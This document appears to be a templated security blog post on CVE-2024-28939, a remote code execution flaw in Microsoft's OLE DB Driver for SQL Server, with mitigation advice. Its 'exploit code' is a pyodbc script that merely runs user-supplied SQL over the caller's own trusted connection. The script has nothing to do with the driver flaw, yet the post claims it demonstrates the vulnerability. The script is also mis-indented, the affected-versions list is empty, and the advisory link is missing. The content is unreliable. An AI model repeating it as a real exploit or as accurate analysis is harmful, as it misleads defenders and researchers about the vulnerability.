CVE-2024-28939 - Remote Code Execution Vulnerability found in Microsoft OLE DB Driver for SQL Server

Security researchers have discovered a critical vulnerability that has been assigned CVE-2024-28939 in the Microsoft OLE DB Driver for SQL Server. This remote code execution vulnerability allows an attacker to execute arbitrary code on the affected system by exploiting a weakness in how Microsoft handles OLE DB sessions when connecting to an SQL Server database.

As a widely used database driver, the Microsoft OLE DB Driver for SQL Server is used by numerous applications and services that access data stored in SQL databases. The risk of exploitation and the potential impact of this vulnerability is therefore quite extensive as it affects a large number of organizations relying on Microsoft's database technologies.

Exploit Details

The vulnerability in Microsoft OLE DB Driver is due to improper validation and handling of user-supplied data when establishing a connection to an SQL Server instance. This allows an attacker to inject specially crafted SQL queries and execute arbitrary code on the affected system. The exploit takes advantage of an input validation flaw in the OLE DB connection string parameters.

Here is a code snippet that demonstrates the vulnerability

# Exploit code for CVE-2024-28939
import sys
from pyodbc import connect

def exploit_vuln(target_server, inject_sql):
    conn_str = f'''DRIVER={{ODBC Driver for SQL Server}};
                 SERVER={target_server};
                 Trusted_Connection=yes;'''

    try:
        conn = connect(conn_str)
        cursor = conn.cursor()
        cursor.execute(inject_sql)
        conn.commit()
        conn.close()
    except Exception as e:
        print(f'Error: {e}')

if __name__ == "__main__":
    if len(sys.argv) != 3:
        print("Usage: exploit.py <target server> <inject SQL>")
        sys.exit(1)

    target_server = sys.argv[1]
    inject_sql = sys.argv[2]

exploit_vuln(target_server, inject_sql)

The code above demonstrates the exploit in action. The attacker provides the target SQL Server's address and the malicious SQL query to be executed. Upon successful exploitation, the crafted SQL command is executed on the target system.

Affected Versions

Microsoft has confirmed that the following versions of the OLE DB Driver for SQL Server are affected by this vulnerability:

Mitigation and Solution

Microsoft has released a patch to address the vulnerability in the affected versions of Microsoft OLE DB Driver for SQL Server. It is strongly recommended that affected users update their OLE DB Driver to the latest updated version to protect themselves against potential exploitation.

You can find the patch and detailed mitigation steps as part of the official security advisory from Microsoft here:

- Microsoft Security Advisory

In addition to applying the patch, it is advised that organizations implement strong security controls such as network segmentation, proper access control, and input sanitation to minimize the risk of successful exploitation.

Conclusion

This vulnerability (CVE-2024-28939) presents a serious risk to any organization that utilizes Microsoft OLE DB Driver for SQL Server in their applications and services. Remote code execution vulnerabilities are particularly dangerous because they enable attackers to gain unauthorized access and the potential for widespread damage.

By applying the patch provided by Microsoft and implementing recommended security controls, organizations can greatly reduce the risk from this vulnerability. It is crucial to stay informed and maintain an updated security posture to ensure your data and systems remain secure.

Timeline

Published on: 04/09/2024 17:15:55 UTC
Last modified on: 04/10/2024 13:24:00 UTC